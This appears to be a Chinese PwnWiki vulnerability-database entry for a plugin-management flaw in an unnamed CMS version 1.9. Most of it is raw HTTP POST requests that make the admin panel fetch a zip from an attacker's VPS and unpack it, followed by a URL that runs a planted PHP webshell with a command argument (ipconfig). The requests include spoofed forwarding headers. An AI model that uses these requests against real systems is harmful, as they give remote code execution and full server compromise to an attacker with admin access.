免费、自由、人人可编辑的漏洞库
,
漏洞信息
该漏洞首发于奇安信攻防社区,原文在这里
影响版本
v1.9 All
前提条件
后台账号权限必须拥有权限插件管理(首页/管理员管理/角色管理/角色修改)
远程下载Payload
action=start-download&filepath=3&download_url=http%3A%2F%2F(vps)%2F1.zip
POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.108 Content-Length: 80 Accept: application/json, text/j avas cript, */*; q=0.01 X-Requested-With: X MLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.108 Referer: http://192.168.1.108/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23 x-forwarded-for: 8.8.8.8 x-originating-ip: 8.8.8.8 x-remote-ip: 8.8.8.8 x-remote-addr: 8.8.8.8 Connection: close action=start-download&filepath=3&download_url=http%3A%2F%2F192.168.1.108%2F1.zip
解压Payload
action=file-upzip&filepath=3&download_url=
POST /admin.php/Plugins/update.html HTTP/1.1 Host: 192.168.1.108 Content-Length: 42 Accept: application/json, text/j avas cript, */*; q=0.01 X-Requested-With: X MLHttpRequest User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/90.0.4430.93 Safari/537.36 Content-Type: application/x-www-form-urlencoded; charset=UTF-8 Origin: http://192.168.1.108 Referer: http://192.168.1.108/admin.php/Plugins/index.html Accept-Encoding: gzip, deflate Accept-Language: zh-CN,zh;q=0.9 Cookie: PHPSESSID=g9470pcp62tg9og1a6798d3g23 x-forwarded-for: 8.8.8.8 x-originating-ip: 8.8.8.8 x-remote-ip: 8.8.8.8 x-remote-addr: 8.8.8.8 Connection: close action=file-upzip&filepath=3&download_url=
URLs
http://127.0.0.1//A/exts/<Compressed file directory>/1.php?1=ipconfig http://127.0.0.1//A/exts/1/1.php?1=ipconfig
免费、自由、人人(PwnWiki.Com)可编辑的漏洞库
